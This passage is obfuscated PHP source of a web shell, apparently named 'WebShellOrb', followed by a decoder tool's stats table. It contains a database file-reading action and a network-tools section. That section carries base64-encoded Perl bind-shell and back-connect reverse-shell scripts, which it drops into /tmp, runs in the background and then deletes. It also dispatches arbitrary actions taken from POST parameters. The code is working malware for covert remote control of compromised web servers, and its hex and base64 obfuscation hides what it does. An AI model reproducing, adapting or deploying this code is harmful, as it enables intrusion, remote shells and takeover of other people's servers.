echo "<f\x6f\x72m\x20\x6fns\x75\x62\x6dit\x3d\x27d\x2esf.p1\x2e\x76a\x6cue\x3d\"\x6c\x6fadf\x69\x6c\x65\";doc\x75\x6d\x65\x6et.sf.\x702.\x76a\x6c\x75e\x3d\x74hi\x73.f.\x76a\x6c\x75e;d\x6f\x63um\x65\x6e\x74\x2esf.s\x75\x62m\x69\x74()\x3br\x65tu\x72n f\x61\x6cse;'><\x73pan\x3eL\x6fad\x20fi\x6ce\x3c/\x73\x70\x61\x6e\x3e\x20<input\x20\x20\x63\x6ca\x73\x73\x3d\x27\x74\x6f\x6fl\x73I\x6ep'\x20\x74y\x70\x65\x3dte\x78\x74\x20n\x61\x6d\x65=f>\x3ci\x6e\x70ut \x74\x79\x70\x65=s\x75b\x6d\x69t val\x75\x65='>\x3e\x27></\x66o\x72\x6d\x3e";
}
if (@$_POST["\x701"] == "\x6coa\x64fi\x6c\x65") {
${${"G\x4c\x4f\x42\x41\x4cS"}["k\x6d\x69\x69\x68\x63q\x70\x61\x6e\x72s"]} = $db->loadFile($_POST["\x70\x32"]);
echo "<\x62\x72/\x3e<\x70\x72e c\x6c\x61\x73\x73\x3dml1\x3e" . htmlspecialchars(${${"\x47LO\x42ALS"}["\x6b\x6d\x69i\x68\x63q\x70\x61\x6e\x72\x73"]}["\x66il\x65"]) . "\x3c/pre>";
}
} else {
echo htmlspecialchars($db->error());
}
echo "</\x64\x69\x76>";
WebShellOrbFooter();
}
function actionNetwork()
{
${"GL\x4fB\x41\x4cS"}["\x6e\x79\x78\x7axhcx\x75"] = "\x62\x61\x63\x6b_\x63on\x6ee\x63\x74_p";
WebShellOrbHeader();
${${"G\x4c\x4fB\x41LS"}["\x6ey\x78\x7a\x78\x68cxu"]} = "\x49\x79\x45\x76dX\x4e\x79L\x32\x4ap\x62\x699wZ\x58\x4as\x44Qp\x31\x63\x32UgU29\x6a\x612\x56\x30Ow\x30\x4b\x4a\x47lhZ\x47Ry\x50Wlu\x5aX\x52\x66YXR\x76\x62\x69\x67kQ\x56\x4aH\x56l\x73\x77X\x53k\x67f\x48wg\x5aG\x6c\x6c\x4bC\x4a\x46\x63nJv\x63\x6aog\x4aCF\x63b\x69\x49\x70\x4f\x770KJH\x42hZ\x47\x52yP\x58\x4e\x76Y2\x74h\x5a\x47RyX2\x6c\x75\x4b\x43\x52B\x55k\x64WWz\x46dLCAka\x57\x46kZ\x48\x49pIHx8\x49\x47\x52pZS\x67i\x52XJyb\x33\x49\x36\x49C\x51h\x58\x47\x34\x69\x4b\x54sN\x43\x69\x52w\x63m\x39\x30bz\x31n\x5aX\x52\x77\x63m9\x30\x62\x32\x4a\x35b\x6dF\x74Z\x53\x67\x6e\x64G\x4e\x77J\x79\x6b\x37\x44\x51p\x7ab\x32NrZX\x51\x6fU09\x44\x53\x30\x56\x55LCB\x51Rl\x39J\x54k\x56\x55LCBT\x540\x4e\x4c\x581NU\x55k\x56B\x54\x53\x77\x67J\x48\x42y\x623R\x76K\x53\x42\x38fC\x42k\x61W\x55\x6fIkV\x79c\x6d\x39\x79\x4f\x69AkIVxu\x49\x69\x6b\x37\x44Qpjb25\x75ZW\x4e\x30KF\x4e\x50Q\x30tF\x56\x43w\x67J\x48BhZ\x47RyKSB8\x66CB\x6b\x61\x57\x55\x6fI\x6bV\x79\x63m\x39\x79O\x69A\x6b\x49V\x78u\x49\x69\x6b7D\x51pvc\x47Vu\x4bFNU\x52\x45\x6cO\x4c\x43Ai\x50iZ\x54T0N\x4cR\x56Q\x69\x4b\x54s\x4eCm\x39wZ\x57\x34o\x551\x52ET1\x56\x55\x4cC\x41iP\x69\x5aT\x540\x4eL\x52V\x51iKT\x73N\x43\x6d\x39wZW4oU1\x52\x45R\x56\x4a\x53\x4c\x43AiP\x69\x5aTT\x30N\x4cR\x56Qi\x4bT\x73\x4eCn\x4e\x35\x63\x33R\x6c\x62Sg\x6eL\x32\x4ap\x62\x69\x39\x7a\x61C\x41\x74\x61Sc\x70\x4fw0K\x592x\x76c\x32\x55\x6f\x55\x31\x52E\x53U4\x70Ow0\x4b\x592xvc\x32\x55oU1RE\x54\x31VU\x4bT\x73\x4e\x43m\x4e\x73b\x33Nl\x4bFNU\x52E\x56SU\x69k\x37";
${"\x47L\x4fBA\x4c\x53"}["n\x6c\x68\x68\x73z\x69\x67"] = "b\x69\x6ed_port\x5fp";
${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6e\x6c\x68h\x73z\x69\x67"]} = "\x49yE\x76d\x58NyL\x32J\x70\x62\x69\x39\x77\x5aXJ\x73\x44\x51o\x6bU\x30\x68F\x54\x45w\x39I\x699i\x61\x57\x34v\x632\x67\x67\x4cW\x6b\x69Ow\x30K\x61\x57Yg\x4b\x45BBU\x6bdW\x49\x44\x77\x67\x4d\x53k\x67\x65yBleG\x6c\x30\x4bDE\x70\x4f\x79B9\x44Q\x701c\x32UgU\x329ja\x32\x560O\x770K\x63\x32\x39j\x612V0KF\x4d\x73\x4a\x6c\x42\x47\x58\x30l\x4fR\x56Q\x73JlN\x50Q0t\x66\x55\x31\x52\x53RU\x46\x4eL\x47\x64\x6cdH\x42\x79b\x33\x52vY\x6e\x6cu\x59W1l\x4b\x43\x640\x593\x41\x6e\x4b\x53\x6bg\x66\x48w\x67\x5a\x47llIC\x4a\x44\x59\x5750IGN\x79ZW\x460Z\x53Bz\x62\x32N\x72ZXRcbiI7\x44\x51pz\x5aX\x52\x7a\x622\x4er\x62\x33\x42\x30\x4b\x46\x4d\x73\x550\x39MX\x31\x4e\x50Q\x30\x74\x46V\x43x\x54\x54\x319\x53RV\x56\x54R\x55F\x45RF\x49\x73\x4d\x53\x6b7\x44\x51\x70\x69\x61\x575\x6bKFM\x73c29ja2FkZH\x4a\x66\x61W\x34oJE\x46\x53R1\x5ab\x4dF\x30s\x53\x55\x35\x42\x52ERS\x580FOW\x53kp\x49H\x78\x38\x49\x47\x52p\x5aS\x41iQ2Fu\x64\x43Bvc\x47\x56uIH\x42\x76c\x6e\x52cb\x69I\x37\x44\x51\x70sa\x58\x4e0\x5a\x57\x34oUy\x77\x7aK\x53B\x38\x66CBkaWUg\x49\x6b\x4e\x68b\x6eQ\x67\x62Glzd\x47\x56\x75IHBvc\x6eR\x63b\x69\x497\x44Qp3\x61\x47lsZ\x53\x67\x78K\x53B7\x44Qo\x4a\x59\x57N\x6aZX\x420\x4bENPT\x6b\x34s\x55yk\x37\x44\x51\x6f\x4a\x61WY\x6fI\x53\x67\x6b\x63Gl\x6b\x50W\x5avcm\x73p\x4bS\x42\x37\x44Q\x6f\x4a\x43\x57RpZ\x53\x41iQ2F\x75bm9\x30IG\x5avcm\x73\x69IGl\x6d\x49Cg\x68\x5a\x47V\x6d\x61W5l\x5a\x43A\x6bcGl\x6b\x4bT\x73NCg\x6b\x4ab\x33Bl\x62i\x42TV\x45\x52JTi\x77\x69\x50\x43Z\x44\x54\x305\x4f\x49j\x73N\x43\x67k\x4a\x623\x42\x6c\x62\x69\x42\x54\x56\x45RP\x56VQs\x49j\x34mQ\x309OTiI\x37DQ\x6fJ\x43\x579wZ\x57\x34\x67U\x31\x52\x45\x52\x56J\x53L\x43I+\x4a\x6b\x4e\x50\x54\x6b4\x69\x4f\x770KC\x51l\x6c\x65G\x56\x6aICR\x54S\x45VM\x54\x43B8\x66\x43\x42\x6b\x61W\x55\x67\x63HJ\x70b\x6eQg\x51\x309O\x54\x69\x41\x69\x51\x32Fu\x64\x43\x42l\x65GV\x6adXRl\x49\x43\x52TSEV\x4d\x54Fx\x75I\x6asN\x43\x67\x6bJ\x59\x32\x78\x76\x63\x32UgQ\x309OTjs\x4eCg\x6b\x4a\x5a\x58\x68\x70d\x43AwO\x770KCX0\x4e\x43\x6e\x30\x3d";
echo "<h1\x3e\x4e\x65\x74w\x6frk to\x6f\x6cs</h\x31\x3e\x3c\x64i\x76 \x63lass\x3dco\x6et\x65\x6et>\n\t<f\x6fr\x6d\x20\x6ea\x6de='\x6efp' onS\x75\x62\x6dit=\"\x67(\x6e\x75\x6cl,\x6eull,\x27\x62p\x70',t\x68\x69\x73.port\x2eva\x6cu\x65);\x72\x65\x74u\x72n \x66\x61\x6c\x73e\x3b\">\n\t<\x73pa\x6e>B\x69\x6e\x64 \x70\x6f\x72\x74 to\x20/\x62\x69\x6e/s\x68 [pe\x72l]</\x73\x70\x61\x6e\x3e\x3c\x62\x72/>\n\t\x50o\x72t: \x3c\x69\x6epu\x74 ty\x70\x65=\x27t\x65\x78\x74' nam\x65\x3d\x27\x70\x6frt'\x20\x76\x61\x6cu\x65\x3d'3\x31\x333\x37\x27> \x3ci\x6e\x70ut t\x79\x70\x65\x3d\x73ubm\x69t\x20val\x75\x65=\x27\x3e>\x27>\n\t\x3c/form>\n\t\x3cf\x6frm \x6ea\x6de\x3d'n\x66\x70'\x20\x6fn\x53ubm\x69t\x3d\"g(n\x75\x6c\x6c,\x6eu\x6c\x6c,\x27\x62\x63\x70\x27,th\x69\x73\x2e\x73\x65\x72v\x65\x72\x2e\x76\x61\x6c\x75e,t\x68i\x73.\x70\x6f\x72\x74.v\x61\x6cu\x65);\x72\x65tur\x6e\x20f\x61\x6c\x73e;\">\n\t\x3c\x73\x70\x61n\x3e\x42ac\x6b-c\x6f\x6en\x65c\x74 [\x70e\x72\x6c]</\x73p\x61\x6e>\x3c\x62r/>\n\tSe\x72\x76er: \x3cinp\x75t\x20ty\x70\x65='text' \x6e\x61\x6d\x65='\x73\x65rv\x65\x72' \x76al\x75e='" . $_SERVER["RE\x4d\x4fT\x45\x5f\x41\x44\x44R"] . "\x27> \x50\x6frt:\x20<\x69\x6ep\x75\x74\x20\x74y\x70e=\x27te\x78t'\x20name=\x27\x70\x6f\x72t'\x20\x76\x61l\x75\x65=\x27\x33\x31\x333\x37\x27\x3e\x20<\x69\x6epu\x74\x20typ\x65\x3d\x73u\x62\x6d\x69t\x20\x76al\x75\x65='\x3e\x3e\x27>\n\t</\x66\x6frm><b\x72>";
if (isset($_POST["p1"])) {
function cf($f, $t)
{
$xcwsiljfsd = "\x66";
$lwuzjrm = "w";
${$lwuzjrm} = @fopen(${$xcwsiljfsd}, "w") or @function_exists("\x66\x69l\x65_put_\x63on\x74e\x6et\x73");
if (${${"\x47\x4c\x4fBALS"}["\x65\x65\x6cp\x63\x66\x73\x75\x79\x6d"]}) {
${"GL\x4f\x42A\x4cS"}["h\x6fom\x71\x76\x68"] = "w";
@fwrite(${${"\x47\x4c\x4fB\x41\x4cS"}["h\x6f\x6f\x6d\x71v\x68"]}, @base64_decode(${${"GL\x4fBALS"}["\x72\x6e\x70h\x62\x77\x67qya\x64"]}));
@fclose(${${"\x47\x4cO\x42AL\x53"}["\x65el\x70\x63\x66\x73\x75\x79\x6d"]});
}
}
if ($_POST["\x701"] == "bpp") {
cf("/t\x6d\x70/\x62\x70\x2epl", ${${"G\x4c\x4fB\x41L\x53"}["j\x62\x7ae\x6f\x61b"]});
${"\x47\x4cO\x42\x41\x4cS"}["\x76\x72\x6ckxl\x6e\x6a\x78"] = "\x6f\x75t";
${${"\x47\x4c\x4f\x42\x41LS"}["v\x72\x6ck\x78ln\x6a\x78"]} = WebShellOrbEx("p\x65\x72l /t\x6dp/bp.pl " . $_POST["\x702"] . "\x20\x31\x3e/dev/\x6e\x75\x6cl \x32\x3e&1\x20\x26");
sleep(1);
echo "\x3c\x70r\x65 cla\x73\x73\x3dm\x6c\x31\x3e$out\n" . WebShellOrbEx("\x70\x73\x20a\x75x | g\x72ep b\x70\x2epl") . "</\x70re\x3e";
unlink("/tmp/bp\x2e\x70l");
}
if ($_POST["\x70\x31"] == "\x62\x63p") {
${"\x47\x4c\x4fBAL\x53"}["\x78\x79c\x75\x67\x74\x70"] = "\x62ac\x6b_\x63o\x6e\x6e\x65c\x74\x5fp";
${"G\x4cO\x42\x41L\x53"}["\x74m\x6b\x70\x63\x6a\x70"] = "o\x75t";
cf("/tm\x70/bc.\x70l", ${${"GLO\x42A\x4cS"}["\x78\x79\x63ug\x74\x70"]});
${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x74\x6d\x6b\x70\x63\x6ap"]} = WebShellOrbEx("\x70\x65\x72l\x20/tm\x70/\x62\x63.\x70l " . $_POST["\x702"] . " " . $_POST["\x70\x33"] . "\x20\x31>/de\x76/\x6e\x75ll\x20\x32>&\x31 &");
sleep(1);
echo "<pre\x20\x63l\x61s\x73=\x6dl\x31\x3e$out\n" . WebShellOrbEx("\x70\x73\x20a\x75x\x20| g\x72e\x70\x20b\x63\x2epl") . "\x3c/p\x72\x65>";
unlink("/\x74\x6d\x70/bc\x2e\x70\x6c");
}
}
echo "</\x64i\x76\x3e";
WebShellOrbFooter();
}
if (empty($_POST["\x61"])) {
$lzspptfkyf = "\x64\x65\x66\x61\x75l\x74_act\x69o\x6e";
$jwpwgpdoyx = "\x64\x65f\x61\x75\x6c\x74_\x61\x63\x74\x69\x6f\x6e";
if (isset(${${"GL\x4f\x42AL\x53"}["j\x65\x68\x6ew\x6bv\x68\x71"]}) && function_exists("\x61c\x74i\x6fn" . ${$lzspptfkyf}))
$_POST["\x61"] = ${$jwpwgpdoyx};
else
$_POST["\x61"] = "\x53\x65c\x49\x6efo";
}
if (!empty($_POST["\x61"]) && function_exists("\x61\x63\x74io\x6e" . $_POST["a"]))
call_user_func("\x61ct\x69o\x6e" . $_POST["a"]);
exit;Function Calls
| None |
Stats
| MD5 | 824377eea4ce8ba77ca94a0630cfd6b3 |
| Eval Count | 0 |
| Decode Time | 240 ms |